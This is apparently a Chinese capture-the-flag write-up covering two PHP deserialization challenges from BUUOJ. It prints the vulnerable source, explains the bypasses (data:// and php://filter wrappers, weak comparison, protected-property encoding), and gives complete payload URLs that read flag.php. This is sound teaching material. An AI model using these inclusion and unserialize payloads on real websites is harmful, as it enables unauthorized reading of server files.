buuoj_unserialize

[ZJCTF 2019]NiZhuanSiWei

题目直接给出源代码

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>      

需要传进三个参数 text，file，password。读第一个 if，传入 text 且读取 text 文件使其内容为 welcome to the zjctf

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))      

data 伪协议传参

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=      

（也可以 ?test=php://input，post 传入 welcome to the zjctf）

然后看接下来的代码，正则过滤了 flag 关键字，提示存在 useless.php 文件

if(preg_match("/flag/",$file)){
    echo "Not now!";
    exit(); 
}else{
    include($file);  //useless.php
    $password = unserialize($password);
    echo $password;
}      

使用 php://filter 协议读取

file=php://filter/read=convert.base64-encode/resource=useless.php      

base64 解码后得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>       

file_get_contents 读取文件内容，再结合题目源代码 $password = unserialize($password); 存在反序列化漏洞，所以可以将 $file 赋值为 flag.php，序列化 Flag 类

<?php  

class Flag{
    public $file = 'flag.php';    
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$b = new Flag();
echo serialize($b);
?>  
//O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}      

最终 payload 为，查看网页源代码得到 flag

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}      

[网鼎杯 2020 青龙组]AreUSerialz

还没到入职时间都要长蘑菇了，刷刷题吧

打开题目就是源码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}      

审计代码，GET方式传入 str 字符串，is_valid() 函数使 str 的每一个字符 ascii 范围都在 32 到 125 之间（即字符串的每一个字符都是可打印的），然后对字符串执行反序列化操作

析构方法中，如果 op === "2" （强类型比较），那么就将 op 赋值为 "1"，content 赋值为空，并执行 process() 函数

process() 函数中，如果op == "1"（弱类型比较），则进入 write() 函数，如果 op == "2"，则进入 read() 函数，否则输出报错

所以只要令 op=2（整数int），op === "2" 为假，op == "2" 为真，即可进入 read() 函数。filename 是可以控制的，再使用 file_get_contents() 函数借助 php://filter 伪协议读取文件，获取到文件后使用 output() 函数输出

还有一个需要注意的地方是 $op，$filename，$content 三个变量权限都是 protected，而 protected 权限的变量在序列化的时会有 %00*%00 字符，%00字符的 ascii 码为0，就无法通过上面的 is_valid 函数校验，php7.1+ 版本对属性类型不敏感，所以本地序列化的时候将属性改为 public 即可绕过

<?php
class FileHandler {
    public  $op = 2;
    public  $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
    public  $content;
 
}
$a = new FileHandler();
$b = serialize($a);
echo $b;
?>

//O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}      

payload 如下，打印出的结果再用 base64 解密即可得到 flag

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}      

参考文章：

https://www.cnblogs.com/Cl0ud/p/12874458.html